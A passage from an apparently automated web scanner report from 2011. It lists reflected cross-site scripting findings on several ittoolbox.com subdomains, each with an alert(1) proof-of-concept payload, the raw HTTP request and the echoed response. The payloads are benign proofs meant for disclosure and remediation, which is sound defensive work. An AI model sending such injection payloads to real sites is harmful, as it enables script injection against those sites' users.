Severity:   High
Confidence:   Certain
Host:   http://projectmanagement.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bde81'-alert(1)-'9af5a95404e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?bde81'-alert(1)-'9af5a95404e=1 HTTP/1.1
Host: projectmanagement.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70526
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=srzbh0451zvt1aykxncvhz45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Project Man
...[SNIP]...
&& sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fprojectmanagement.ittoolbox.com%2fDefault.aspx%3fbde81'-alert(1)-'9af5a95404e%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.110. http://projectmanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://projectmanagement.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b8f"style%3d"x%3aexpression(alert(1))"94a69cf8ec8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10b8f"style="x:expression(alert(1))"94a69cf8ec8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?10b8f"style%3d"x%3aexpression(alert(1))"94a69cf8ec8=1 HTTP/1.1
Host: projectmanagement.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70641
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s1g3rr45jcox1t55dq4cltjq; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Project Man
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://projectmanagement.ittoolbox.com/Default.aspx?10b8f"style="x:expression(alert(1))"94a69cf8ec8=1" />
...[SNIP]...

3.111. http://sap.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sap.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c01"style%3d"x%3aexpression(alert(1))"faaf9b620ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5c01"style="x:expression(alert(1))"faaf9b620ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?a5c01"style%3d"x%3aexpression(alert(1))"faaf9b620ef=1 HTTP/1.1
Host: sap.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 83811
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bdwb4luobk3iif45wvtitkjv; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SAP Communi
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://sap.ittoolbox.com/Default.aspx?a5c01"style="x:expression(alert(1))"faaf9b620ef=1" />
...[SNIP]...

3.112. http://sap.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sap.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f81'-alert(1)-'33dbbb56366 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?64f81'-alert(1)-'33dbbb56366=1 HTTP/1.1
Host: sap.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 83696
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jcmkywvsla4hqv55tmvrz555; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SAP Communi
...[SNIP]...
ender != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fsap.ittoolbox.com%2fDefault.aspx%3f64f81'-alert(1)-'33dbbb56366%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.113. http://security.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://security.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67250'-alert(1)-'34814febd59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?67250'-alert(1)-'34814febd59=1 HTTP/1.1
Host: security.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82066
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ae02ejrdk33rhrry3e05jd55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Security Co
...[SNIP]...
!= null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fsecurity.ittoolbox.com%2fDefault.aspx%3f67250'-alert(1)-'34814febd59%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.114. http://security.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://security.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19004"style%3d"x%3aexpression(alert(1))"e443b525a7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19004"style="x:expression(alert(1))"e443b525a7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?19004"style%3d"x%3aexpression(alert(1))"e443b525a7a=1 HTTP/1.1
Host: security.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82181
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dfp1w3y02wvntw3hcmaoh455; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Security Co
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://security.ittoolbox.com/Default.aspx?19004"style="x:expression(alert(1))"e443b525a7a=1" />
...[SNIP]...

3.115. http://siebel.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://siebel.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aea1c'-alert(1)-'e4c1cea88a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aea1c'-alert(1)-'e4c1cea88a6=1 HTTP/1.1
Host: siebel.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72633
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4pxfuha5qkzrox55243pqb3a; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Siebel Comm
...[SNIP]...
er != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fsiebel.ittoolbox.com%2fDefault.aspx%3faea1c'-alert(1)-'e4c1cea88a6%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.116. http://siebel.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://siebel.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5748c"style%3d"x%3aexpression(alert(1))"896ccf64b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5748c"style="x:expression(alert(1))"896ccf64b9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?5748c"style%3d"x%3aexpression(alert(1))"896ccf64b9b=1 HTTP/1.1
Host: siebel.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nsjvz2bfl2vbqrjtqibnji45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Siebel Comm
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://siebel.ittoolbox.com/Default.aspx?5748c"style="x:expression(alert(1))"896ccf64b9b=1" />
...[SNIP]...

3.117. http://storage.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storage.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b153"style%3d"x%3aexpression(alert(1))"279e64ba5fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8b153"style="x:expression(alert(1))"279e64ba5fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8b153"style%3d"x%3aexpression(alert(1))"279e64ba5fc=1 HTTP/1.1
Host: storage.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71962
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uphrzt45c0z2rp45gq2ga32n; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Storage Com
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://storage.ittoolbox.com/Default.aspx?8b153"style="x:expression(alert(1))"279e64ba5fc=1" />
...[SNIP]...

3.118. http://storage.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storage.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0463'-alert(1)-'a06fbc40b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c0463'-alert(1)-'a06fbc40b91=1 HTTP/1.1
Host: storage.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71850
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=id0ajg55ttoi4r2xhbzjzi55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Storage Com
...[SNIP]...
r != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fstorage.ittoolbox.com%2fDefault.aspx%3fc0463'-alert(1)-'a06fbc40b91%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.119. http://supplychain.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://supplychain.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3242"style%3d"x%3aexpression(alert(1))"d4a4cddf558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3242"style="x:expression(alert(1))"d4a4cddf558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?b3242"style%3d"x%3aexpression(alert(1))"d4a4cddf558=1 HTTP/1.1
Host: supplychain.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75056
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vmkl0r45zestph55yywxduu4; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SCM Communi
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://supplychain.ittoolbox.com/Default.aspx?b3242"style="x:expression(alert(1))"d4a4cddf558=1" />
...[SNIP]...

3.120. http://supplychain.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://supplychain.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d17c7'-alert(1)-'6dcaf5eea3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d17c7'-alert(1)-'6dcaf5eea3a=1 HTTP/1.1
Host: supplychain.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74939
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uhazjb3ghrjdbp45y0c4ad2g; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SCM Communi
...[SNIP]...
null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fsupplychain.ittoolbox.com%2fDefault.aspx%3fd17c7'-alert(1)-'6dcaf5eea3a%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.121. http://telephony.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://telephony.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ac"style%3d"x%3aexpression(alert(1))"e3abb888eab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 478ac"style="x:expression(alert(1))"e3abb888eab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?478ac"style%3d"x%3aexpression(alert(1))"e3abb888eab=1 HTTP/1.1
Host: telephony.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62722
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bzineuetfhf1b455njvyoj45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://telephony.ittoolbox.com/Default.aspx?478ac"style="x:expression(alert(1))"e3abb888eab=1" />
...[SNIP]...

3.122. http://telephony.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://telephony.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ccc8'-alert(1)-'a149199ca41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?5ccc8'-alert(1)-'a149199ca41=1 HTTP/1.1
Host: telephony.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62605
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ibj0x5yryxkgiy45p1u4yv55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
!= null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2ftelephony.ittoolbox.com%2fDefault.aspx%3f5ccc8'-alert(1)-'a149199ca41%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.123. http://unix.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://unix.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb9e'-alert(1)-'b7dda7dde6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?6fb9e'-alert(1)-'b7dda7dde6f=1 HTTP/1.1
Host: unix.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 80634
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=es4ozeq2t0whigrwvrxax545; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   UNIX Commun
...[SNIP]...
nder != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2funix.ittoolbox.com%2fDefault.aspx%3f6fb9e'-alert(1)-'b7dda7dde6f%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.124. http://unix.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://unix.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4e7"style%3d"x%3aexpression(alert(1))"28a7b7a768f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e4e7"style="x:expression(alert(1))"28a7b7a768f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8e4e7"style%3d"x%3aexpression(alert(1))"28a7b7a768f=1 HTTP/1.1
Host: unix.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 80749
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dircxt45nurb15jv13tld2yb; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   UNIX Commun
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://unix.ittoolbox.com/Default.aspx?8e4e7"style="x:expression(alert(1))"28a7b7a768f=1" />
...[SNIP]...

3.125. http://visualbasic.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visualbasic.ittoolbox.com
Path:   /

Issue detail

